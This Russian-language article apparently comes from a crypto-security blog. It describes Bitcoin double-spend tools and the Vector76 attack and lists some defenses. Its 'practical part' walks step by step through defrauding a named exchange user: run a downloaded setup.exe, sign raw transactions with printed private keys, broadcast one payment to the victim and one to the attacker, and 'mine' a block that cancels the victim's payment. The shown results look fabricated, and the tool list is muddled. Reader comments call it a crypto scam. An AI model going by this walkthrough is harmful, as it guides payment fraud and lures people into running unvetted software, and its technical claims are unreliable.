С развитием криптовалютных технологий и увеличением популярности Bitcoin, на рынке появились различные программные обеспечения, такие как Flash Bitcoin Software и Fake BTC Software. Эти программы могут привести к катастрофическим последствиям на экосистему Bitcoin. В данной статье мы рассмотрим на примере реальных данных, что представляют собой эти программные обеспечения, как они работают и какое влияние оказывают на криптовалюту Bitcoin, а также как эти различные программные обеспечения используют механизм Vector76 Attack, что представляет собой разновидность атаки двойной траты (double-spending attack), при которой злоумышленник пытается провести одну и ту же транзакцию дважды. В отличие от классической атаки двойной траты, Vector76 использует уязвимости в механизмах подтверждения транзакций и временные задержки в распространении блоков по сети Биткоин.
В атаке Vector76 злоумышленник сначала создаёт две транзакции: одну для отправки средств на свой Биткоин адрес и другую для отправки тех же средств на Биткоин адрес продавца. Затем он пытается убедить продавца принять неподтверждённую транзакцию, одновременно распространяя другую транзакцию в сети. Если злоумышленнику удаётся провести свою транзакцию быстрее, чем продавец получит подтверждение, то средства будут отправлены на адрес злоумышленника, а не продавца.
Программное обеспечение
Программные обеспечение облегчают для злоумышленника интервальное использование временного окна между подтверждением транзакции в локальной сети и её распространением по всей сети Bitcoin. Злоумышленник создает две транзакции: одну, которая отправляется в локальную сеть, и другую которая отправляется в основную сеть. Если злоумышленник успевает провести первую транзакцию до того, как вторая будет подтверждена, он может обмануть получателя, заставив его поверить в подлинность первой транзакции. Рассмотрим самые известные программные обеспечение которые применяют для интервального использование временного окна для успешного подтверждением транзакции Биткоина.
Flash Bitcoin Software
Flash Bitcoin Software представляет собой программное обеспечение, которое позволяет пользователям временно увеличивать баланс своего Bitcoin-кошелька. Это достигается за счет создания транзакций, которые выглядят легитимными, но на самом деле не подтверждаются в блокчейне. Такие транзакции могут быть использованы для обмана пользователей и сервисов, принимающих Bitcoin.
Fake BTC Software
Fake BTC Software в свою очередь, предназначено для создания поддельных Bitcoin-транзакций. Эти транзакции могут быть использованы для мошенничества, так как они создают видимость перевода средств, хотя на самом деле никакие средства не передаются. Это программное обеспечение может быть использовано для обмана продавцов и покупателей в криптовалютных сделках.
Dockeyhunt Vector76 Attack
Dockeyhunt Vector76 Attack предназначено для создания двух или несколько Raw транзакции с цель подтверждение через Broadcast Bitcoin Transaction для сценарии двойной траты одним и тем же Биткоином. Суть атаки заключается в том, что злоумышленник отправляет одну и ту же транзакцию в две разные части сети, создавая временное расхождение в блокчейне Bitcoin. Это программное обеспечение также может быть использовано для обмана продавцов и покупателей в криптовалютных сделках и операциях, где принимают различные токены и различные известные криптовалюты Bitcoin, Etherium и.т.д
CGMiner и BFGMiner
CGMiner и BFGMiner эти программные обеспечение предназначены для майнинга могут быть использованы для реализации атак типа Selfish Mining, так как они позволяют майнерам контролировать процесс добычи блоков.
Wireshark
Wireshark – это программное обеспечение для анализа сети и может быть использован для анализа сетевого трафика и реализации Sybil Attack и Eclipse Attack . Мошенники могут использовать модифицированные версии клиента Bitcoin Core для проведения различных атак на консенсусный механизм.
BlockSci
BlockSci – это программное обеспечение позволяет анализировать блокчейн и может быть использован для проведения анализа транзакций и Dusting Attack (DUST ATTACK).
Влияние атаки на сеть Bitcoin
Vector76 Attack была впервые описана в 2011 году и представляет собой комбинацию атак Finney и Race. Атака использует уязвимости в процессе подтверждения транзакций в сети Bitcoin. Основная идея заключается в том, чтобы создать две конфликтующие транзакции и провести их через разные узлы сети, что позволяет злоумышленнику обмануть получателя и провести двойное расходование.
В Race Attack злоумышленник пытается провести две транзакции одновременно, одну из которых он пытается отменить.
В Finney Attack злоумышленник предварительно майнит блок с транзакцией, а затем пытается провести другую транзакцию с теми же монетами.
В Vector76 Attack злоумышленник использует элементы обеих атак для создания двойного расходования (double spending).
Атака Vector76 может иметь серьезные последствия для сети Bitcoin. Она подрывает доверие к системе, так как пользователи могут потерять средства из-за двойного расходования. Кроме того, атака может вызвать задержки в подтверждении транзакций и увеличить нагрузку на сеть.
Этапы атаки:
Создание двух транзакций: Злоумышленник создает две транзакции с одинаковой суммой, но разными получателями. Одна транзакция отправляется в сеть, а другая удерживается в изолированной части сети Bitcoin.
Отправка первой транзакции: Первая транзакция отправляется в локальную сеть, где она быстро подтверждается.
Отправка второй транзакции: Вторая транзакция отправляется в основную сеть Bitcoin.
Подтверждение первой транзакции: Получатель первой транзакции считает её подлинной и предоставляет товар или услугу.
Подтверждение второй транзакции: Вторая транзакция подтверждается в основной сети, и первая транзакция становится недействительной.
Конфликт и двойное расходование: В результате возникает конфликт, и одна из транзакций может быть включена в блокчейн, что приводит к двойному расходованию.
Слияние сетей: Когда изолированная часть сети сливается с основной, возникает конфликт, и одна из транзакций аннулируется.
Механизмы обнаружения и предотвращения Vector76 Attack:
Для защиты сети Bitcoin от атак типа Vector76 используются различные механизмы обнаружения и предотвращения атак, а также необходимо внедрить эффективные алгоритмы и системы для обнаружения подозрительных транзакций. Рассмотрим несколько подходов:
Анализ блоков и транзакций: Майнинговое ПО и узлы сети анализируют блоки и транзакции на предмет конфликтов и аномалий.
Увеличение количества подтверждений: Рекомендуется ждать большее количество подтверждений (например, 6 и более) перед тем, как считать транзакцию окончательно подтвержденной. Увеличение времени ожидания до подтверждения транзакции может снизить вероятность успешной атаки.
Использование алгоритмов машинного обучения: Современные методы машинного обучения могут быть использованы для обнаружения подозрительных паттернов в транзакциях и блоках.
Мониторинг Сети: Использование специализированных программ для мониторинга сети на предмет подозрительных транзакций и поведения.
Многоуровневое подтверждение: Использование нескольких уровней подтверждения транзакций может повысить безопасность.
Анализ аномалий: Внедрение систем анализа аномалий для выявления подозрительных транзакций и цепочек блоков.
Обновление протоколов: Регулярное обновление протоколов безопасности и внедрение новых методов защиты может повысить устойчивость сети к атакам.
Усиление консенсусного механизма: Внедрение дополнительных проверок и подтверждений для транзакций, что усложнит проведение атак.
Распространение альтернативного блока для проведения Vector76 Attack:
Создание двух конфликтующих транзакций: Злоумышленник создает две транзакции, использующие одни и те же входы, но с разными получателями.
Распространение первой транзакции: Первая транзакция отправляется в сеть и включается в блок, который майнеры начинают подтверждать.
Создание альтернативного блока: Злоумышленник использует собственное майнинговое ПО для создания альтернативного блока, содержащего вторую транзакцию.
Распространение альтернативного блока: В момент, когда первая транзакция уже получила несколько подтверждений, злоумышленник распространяет альтернативный блок, который может быть принят сетью, если он содержит большее количество подтверждений.
Структура Vector76 Attack:
Подготовка: Злоумышленник создает две транзакции: одну для жертвы (Т1) и одну для себя (Т2).
Майнинг блока: Злоумышленник майнит блок, включающий Т2, но не публикует его.
Проведение Т1: Злоумышленник отправляет Т1 в сеть, и жертва принимает ее после одного подтверждения.
Публикация блока: Злоумышленник публикует блок с Т2, который отменяет Т1.
Практическая часть
Рассмотрим пример применение данной атаки с использованием программного обеспечение Dockeyhunt Vector76 Attack
Скачаем программное обеспечение из официального сайта: www.dockeyhunt.com
Установим все необходимые пакеты и библиотеки запустим файл setup.exe
Для проведение успешной атаки нам очень важно создать вторую транзакции (для себя T2) для этого заранее необходимо подготовить Биткоин Кошелек куда мы отправим все наши монеты BTC для дальнейшего хранение в холодном кошельке. Откроем папку и запустим Cold Bitcoin Wallet.exe для генерации нового Биткоин Адреса
Нажимаем Generate Address
Данные нашего нового Биткоин Адреса для дальнейшего хранение в холодном кошельке.
Cold Bitcoin Wallet:
Private Key HEX: 7b774f968a0eff26bb645fa91830a17a749e685ca4fab58b98bc03fd6a48405c
Private Key WIF: 5JkfMchWKeVh5nUmbTHPhFTpMPmWjn5a9JtrR8iBQqPCCmonapz
Private Key WIF compressed: L1MiHzZnRJVdv7jZq51MAeqN11VUFoyBHfys7X2kxCYxSxT9GWRx
Public Key: 04addd5a1ced91a6364c486cbc95cde195108657d1eabb86bf97e5dfa3f099b2ba2b7c42c09f8d7d12c6f68a4d1750ac6abbf1379802b9501d9cc1c51b6dcbc87d
Public Key compressed: 03addd5a1ced91a6364c486cbc95cde195108657d1eabb86bf97e5dfa3f099b2ba
Public Address 1: 1KivXGdoDVPZCZLHpAe8rCztEirdrWuR4Y
Public Address 1 compressed: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq
Public Address 3: 36QRQhDUdaufqTJYfgV76CTor6Nix8Zvz3
Public Address bc1 P2WPKH: bc1qpy79lkrlls0jhva93llvq6tkchrkp5zfgq5ned
Public Address bc1 P2WSH: bc1q3j88twpmde2rwz5tnecdezxsxtxje0cswfjkcfcckq3mx4d3hm2stuw0ss </strong></code></pre><!--EndFragment-->
Теперь устанавливаем связь с получателем в нашем случаем псевдополучателем является пользователь криптобиржи Huobi
Биткоин Адрес псевдополучателя:
https://bitinfocharts.com/bitcoin/address/143gLvWYUojXaWZRrxquRKpVNTkhmr415B
Создание Raw транзакции T1 (жертва)
Псевдополучатель (жертва) является пользователям криптобиржи Huobi и ожидает от отправителя (злоумышленник) сумму в размере: 1.17506256 BTC
(в криптовалюте Bitcoin)
Биткоин Кошелек отправителя на сумму: 1.17521256 BTC
https://btc1.trezor.io/address/1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz
Откроем новый блокнот в Google Colab: https://colab.research.google.com
Клонируем репозиторий Broadcast-Bitcoin-Transaction
!git clone https://github.com/smartiden/Broadcast-Bitcoin-Transaction.git
cd Broadcast-Bitcoin-Transaction/
ls
Запустим Python скрипт bitcoin_info.py (для проверки Биткоин Адреса отправителя)
!python3 bitcoin_info.py
1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz
Для создание Raw транзакции T1 нам понадобится скопировать от Биткоин Адреса: 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz UTXO (Unspent Transaction Output) последний TXID как выход неизрасходованных транзакций для кошелька отправителя.
https://btc1.trezor.io/tx/3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861
Вернемся в корневой каталог и запустим программное обеспечение Dockeyhunt Vector76 Attack
Опция:
При создание транзакции нам необходимо подписать цифровую подпись алгоритмом ECDSA вставим в поле приватный ключ отправителя Биткоин Кошелька: 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz (для проверки мы можем воспользоваться bitaddress)
Private Key: KwoqiXXrWkurxSazHJtmxKstB7g4HX247q7JoKcFDtHpFujKNSiD
Скопируем TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861 и вставим в поле это необходимо для того чтобы была полная проверка транзакций для всех узлов сети Биткоин, так как все входы транзакции являются действительными (это очень важно и необходимо для проведение успешной атаки Vector76 с целью чтобы монеты BTC отправителя не были потрачены заранее). UTXO позволяет более эффективно обрабатывать транзакции, так как каждый выход транзакции может быть использован только один раз (это упрощает управление состоянием Биткоин сети и уменьшает сложность проверки Raw транзакций).
Prev TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861
Скопируем Биткоин Адрес псевдополучателя криптобиржи Huobi: 143gLvWYUojXaWZRrxquRKpVNTkhmr415B и вставим в поле.
Send Address: 143gLvWYUojXaWZRrxquRKpVNTkhmr415B
Скопируем общую сумму Биткоин монет и вставим в поле (для данного отправителя это сумма составляет: 1.17521256 BTC сумму необходимо указать в Satoshi в размере: 117521256)
Total Received: 1.17521256 BTC (117521256 sat/vByte)
Укажем собственную сумму в размере: 15000 sat/vByte это сумма является комиссий, для процесса обработки транзакций майнером. В Биткоине, когда мы отправляем транзакцию, мы платим комиссию майнерам за включение наше созданное Raw транзакции в блокчейн (эта комиссии стимулируют майнеров обрабатывать и подтверждать транзакции).
Fee: 0.00015000 BTC (15000 sat/vByte)
Укажем сумму для отправки монет BTC в нашем случае при выщите с общей суммы 117521256 sat/vByte и размера комиссии: 15000 sat/vByte сумма для отправки будет составлять в Satoshi: 117506256
Sent: 1.17506256 BTC (117506256 sat/vByte)
После того как мы добавили все опции нажимаем Create Transaction
Результат:
Your Bitcoin Address: 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz
Bitcoin Address for sending BTC: 143gLvWYUojXaWZRrxquRKpVNTkhmr415B
Bitcoin Transaction RawTX:
010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006b483045022100dff55be52be07900dd4d2d04473c93249ca78e37955e466437c26f06322f01bc02205ed04a2a4201e8c2b3035de7edfa972e1f7da57dbcca3eaa4fbd4db4cd8ad507012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddffffffff01d0000107000000001976a914216a0d339ab6ddc696b1b239b9b65810c0bf73d588ac00000000
Теперь воспользуемся Python скриптом: pushtx.py для отправки Bitcoin Transaction RawTX
!python3 pushtx.py
010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006b483045022100dff55be52be07900dd4d2d04473c93249ca78e37955e466437c26f06322f01bc02205ed04a2a4201e8c2b3035de7edfa972e1f7da57dbcca3eaa4fbd4db4cd8ad507012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddffffffff01d0000107000000001976a914216a0d339ab6ddc696b1b239b9b65810c0bf73d588ac00000000
Результат:
Enter your raw transaction: 010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006b483045022100dff55be52be07900dd4d2d04473c93249ca78e37955e466437c26f06322f01bc02205ed04a2a4201e8c2b3035de7edfa972e1f7da57dbcca3eaa4fbd4db4cd8ad507012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddffffffff01d0000107000000001976a914216a0d339ab6ddc696b1b239b9b65810c0bf73d588ac00000000
TX: e129cd4257b2c9f5061dfb80d8b7a59e62cbaf3cdfba8d3fde2953759e63bcf0
Transaction successfully broadcasted!
Broadcasting Transactions into the Bitcoin Network: https://broad-casts.ru/bitcoin-network
Псевдополучатель пользователь криптобиржи Huobi видит платеж в сети Биткоин TX: e129cd4257b2c9f5061dfb80d8b7a59e62cbaf3cdfba8d3fde2953759e63bcf0
Теперь злоумышленник приступает ко второму этапу, создание транзакции T2 (для себя) чтобы забрать все монеты на отправленную сумму 1.17506256 BTC (117506256 sat/vByte) из сети Биткоин на баланс своего холодного кошелька.
Создание Raw транзакции T2 (для себя)
Ранее мы создали холодный Биткоин Кошелек, это мы делали заранее именно для создание второй транзакции (для себя T2) чтобы подготовить Биткоин Кошелек: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq куда мы отправим из сети Биткоин все монеты на сумму: 1.17506256 BTC (117506256 sat/vByte) для дальнейшего хранение в холодный кошелек).
Скопируем Биткоин Адрес нового холодного кошелька:
Cold Bitcoin Wallet:
Public Address 1 compressed: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq
Запускаем повторно программное обеспечение Dockeyhunt Vector76 Attack.
Добавим новую опцию с новыми данными
Опция:
Все тоже самое для создание транзакции нам необходимо подписать цифровую подпись алгоритмом ECDSA вставим в поле приватный ключ отправителя Биткоин Кошелька: 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz (для проверки мы можем воспользоваться bitaddress)
Private Key: KwoqiXXrWkurxSazHJtmxKstB7g4HX247q7JoKcFDtHpFujKNSiD
Скопируем TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861 и вставим в поле это необходимо для того чтобы была полная проверка транзакций для всех узлов сети Биткоин, так как все входы транзакции являются действительными (это очень важно и необходимо для проведение успешной атаки Vector76 с целью чтобы монеты BTC отправителя не были потрачены заранее). UTXO позволяет более эффективно обрабатывать транзакции, так как каждый выход транзакции может быть использован только один раз (это упрощает управление состоянием Биткоин сети и уменьшает сложность проверки Raw транзакций).
Prev TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861
Скопируем новый Биткоин Адрес нового холодного кошелька куда мы перенесем все монеты BTC: 1qqQcZbZNvsZoF5×3VcnEcJbzPeXncfKq и вставим в поле.
Send Address: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq
Скопируем общую сумму Биткоин монет и вставим в поле (для данного отправителя это сумма составляет: 1.17521256 BTC сумму необходимо указать в Satoshi в размере: 117521256)
Total Received: 1.17521256 BTC (117521256 sat/vByte)
Укажем собственную сумму в размере: 15000 sat/vByte это сумма является комиссий, для процесса обработки транзакций майнером. В Биткоине, когда мы отправляем транзакцию, мы платим комиссию майнерам за включение наше созданное Raw транзакции в блокчейн (эта комиссии стимулируют майнеров обрабатывать и подтверждать транзакции).
Fee: 0.00015000 BTC (15000 sat/vByte)
Укажем сумму для отправки монет BTC в нашем случае при выщите с общей суммы 117521256 sat/vByte и размера комиссии: 15000 sat/vByte сумма для отправки будет составлять в Satoshi: 117506256
Sent: 1.17506256 BTC (117506256 sat/vByte)
После того как мы добавили все опции нажимаем Create Transaction
Результат:
Your Bitcoin Address: 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz
Bitcoin Address for sending BTC: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq
Bitcoin Transaction RawTX:
010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006a473044022027033ea1c9df979fe39b016ee9ef446fab3e87dd4514623ad8a655e8eab31f0002201b58688b9949a8b9b05cb74b3bd829f6c134c5bef132e9df0eafeea9585abc45012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddfdffffff01d0000107000000001976a914093c5fd87ffc1f2bb3a58ffec06976c5c760d04988ac00000000
Теперь воспользуемся Python скриптом: pushtx.py для отправки Bitcoin Transaction RawTX
!python3 pushtx.py
Результат:
Enter your raw transaction: 010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006a473044022027033ea1c9df979fe39b016ee9ef446fab3e87dd4514623ad8a655e8eab31f0002201b58688b9949a8b9b05cb74b3bd829f6c134c5bef132e9df0eafeea9585abc45012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddfdffffff01d0000107000000001976a914093c5fd87ffc1f2bb3a58ffec06976c5c760d04988ac00000000
TX: d7b2f7279687abd3abf0367ac31223359dc8b53b32b7adbdfc2d0ada2a8015bc
Transaction successfully broadcasted!
Broadcasting Transactions into the Bitcoin Network: https://broad-casts.ru/bitcoin-network
Теперь мы получили TX: d7b2f7279687abd3abf0367ac31223359dc8b53b32b7adbdfc2d0ada2a8015bc осталось лишь добыть блок с помощью майнинга и опубликовать блок в основную цепочку блоков которая включает транзакцию T2 (для себя).
Майнинг и публикация блока в основную цепочку сети Биткоин
Вернемся в корневой каталог, откроем папку и запустим программное обеспечение Block Bitcoin Mining
Чтобы добавить в пустое поле опцию нам необходимо получить данные ввода определенных значении для настройки майнинг блока для этого запустим Python скрипт: block_header.py и водим известное нам UTXO значение которое мы ранее добавляли в хэш опции Prev TXID при создание Raw транзакции Prev TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861
UTXO позволяет более эффективно обрабатывать транзакции, так как каждый выход транзакции может быть использован только один раз (это упрощает управление состоянием Биткоин сети и уменьшает сложность проверки Raw транзакций).
!python3 block_header.py
3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861
Скопируем полученные данные:
Enter TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861
Block Header:
Block: 00000000000000000003e5557c14e955f2c88465bb8c02a4d694a3657a40d79e
Block Height: 808875
Mined Time: 2023-09-22T17:29:25Z
Prev Block: 000000000000000000048e0643366b7c0129d2dd8d2cf758ca6273ed81c765d8
Merkle Root: c1fc30413e984cdd90dc1ac91a69add6c138af950e1c6388cb20759494073d2c
Nonce: 1098256692
Bits: 386198911
Version: 536903680
Добавим RawTX для транзакции T2 (для себя)
Bitcoin Transaction RawTX:
010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006a473044022027033ea1c9df979fe39b016ee9ef446fab3e87dd4514623ad8a655e8eab31f0002201b58688b9949a8b9b05cb74b3bd829f6c134c5bef132e9df0eafeea9585abc45012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddfdffffff01d0000107000000001976a914093c5fd87ffc1f2bb3a58ffec06976c5c760d04988ac00000000
Как только блок для транзакции T2 (для себя) будет добыт с помощью программного обеспечение Block Bitcoin Mining мы получим файл в формате JSON
Наш добытый блок для подтверждение в общей цепочке блокчейна находится в файле: block_hash_mining.json
Откроем файл: block_hash_mining.json с помощью Notepad++
В строке №875 мы видим новый блок.
block_hash: 00000000000000000004401ea0694af9c89564d76bc5462577e312eea5d23fa2
Вернемся обратно в Google Colab и запустим Python скрипт вводим TXID транзакции T2 (для себя)
ВСЕ ВЕРНО!!!
Блок подтверждает подлинность транзакции T2 (для себя).
Также проверим по ссылке в блокчейне:
https://btc1.trezor.io/tx/d7b2f7279687abd3abf0367ac31223359dc8b53b32b7adbdfc2d0ada2a8015bc
Платеж подтвержден майнерами
Транзакция T1 (жертва) отменяется
Платеж псевдополучатель пользователя криптобиржи Huobi автоматический отменяется в сети Биткоин TX: e129cd4257b2c9f5061dfb80d8b7a59e62cbaf3cdfba8d3fde2953759e63bcf0
https://btc1.trezor.io/tx/e129cd4257b2c9f5061dfb80d8b7a59e62cbaf3cdfba8d3fde2953759e63bcf0
Транзакция не найдена по причине отсутствие в общей цепочке блока
Заключение:
Все эти программные обеспечение и инструменты облегчают создание мошеннических схем, что может привести к увеличению числа жертв и потерь монет BTC и ETH среди пользователей. Это, в свою очередь, может вызвать негативное отношение к криптовалютам и криптосообществу в целом.
Ущерб для бизнеса: Многие компании и сервисы, принимающие Bitcoin, могут понести значительные убытки из-за использования поддельных транзакций. Это может привести к отказу от принятия Bitcoin в качестве средства оплаты, что также негативно скажется на его распространении.
Усложнение регулирования: Использование таких программных обеспечений усложняет работу регуляторов и правоохранительных органов, которые пытаются бороться с мошенничеством и отмыванием денег. Это может привести к ужесточению регулирования и ограничений на использование криптовалют.
Необходимость улучшения безопасности: Постоянные угрозы требуют от разработчиков и пользователей внедрения новых мер безопасности и улучшения существующих механизмов защиты. Сообщество разработчиков Bitcoin может принять меры для борьбы с мошенническими транзакциями. Это может включать улучшение алгоритмов подтверждения транзакций и введение новых протоколов безопасности. Однако такие меры могут потребовать значительных ресурсов и времени.
References:
[1] Bitcoin’s Security Model Revisited (Yonatan Sompolinsky and Aviv Zohar School of Engineering and Computer Science, The Hebrew University of Jerusalem, Israel Microsoft Research, Herzliya, Israel)
[2] Security Threats Classification in Blockchains (Jamal Hayat Mosakheil St. Cloud State University)
[3] The Balance Attack or Why Forkable Blockchains Are Ill-Suited for Consortium (Christopher Natoli Vincent Gramoli School of IT University of Sydney Sydney, Australia)
[4] Blockchain Vulnerabilities and Recent Security Challenges: A Review Paper (Aysha AlFaw, Wael Elmedany, Mhd Saeed Sharif, College of Information Technology University of Bahrain Sakhir, Bahrain)
[5] How Much Vulnerable is a Cryptocurrency? Mario Arturo Ruiz Estrada Econographication Virtual Laboratory (EVL)
[6] A SURVEY ON SECURITY ATTACKS AND CHALLENGES IN BITCOIN (Viji Priya .G, Krishna Priya .G, Vivek .M and Ashwini .R Department of Computer Science & Engineering, Jansons Institute of Technology, Coimbatore, Tamilnadu, India)
[7] The BOOK of JARGON ® Cryptocurrency & Blockchain Technology The Latham & Watkins Glossary Acronyms, Slang, and Terminology
[8] The Blockchain Anomaly (Christopher Natoli Vincent Gramoli NICTA/Data61-CSIRO University of Sydney)
[9] Exploring Sybil and Double-Spending Risks in Blockchain Systems (MUBASHAR IQBAL AND RAIMUNDAS MATULEVIČIUS Institute of Computer Science, University of Tartu, 51009 Tartu, Estonia)
[10] Blok Zinciri Teknolojisine Yapılan Saldırılar Üzerine bir İnceleme (Literatür Makalesi/Review Article Oğuzhan TAŞ, Farzad KİANİ Bilgisayar Mühendisliği, İstanbul Sabahattin Zaim Üniversitesi, Mühendislik ve Doğa Bilimleri Fakültesi, İstanbul, Türkiye)
Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.
Telegram: https://t.me/cryptodeeptech
Видеоматериал: https://youtu.be/Mk_BPBCXd3I
DZEN: https://dzen.ru/video/watch/669558eb4bbd297f7d375e06
Источник: https://cryptodeep.ru/vector76-attack
Комментарии (2)
sekuzmin
17.07.2024 05:23Установим все необходимые пакеты и библиотеки запустим файл setup.exe
О, очередная серия сериала КриптоДжыпТечч!!!!! про криптоскам подъехала. Фанаты заждались уже.
Vector76 Attack
обновленная версия Капустис 72?
Создатели программного обеспечения не несут ответственность
Это заблуждение, несут ответственность по Статья 273 УК РФ – «Создание, использование и распространение вредоносных компьютерных программ»
DarkTiger
молодая пешеход добежал до переход (с)
Давайте уж тогда и grep включим заодно, если такие основания для составления списка.
А Bitcoin Core откуда здесь взялась? Не было про нее ничего раньше в тексте.
В общем, перестаньте копипастить, или перечитывайте хотя бы статью перед публикацией.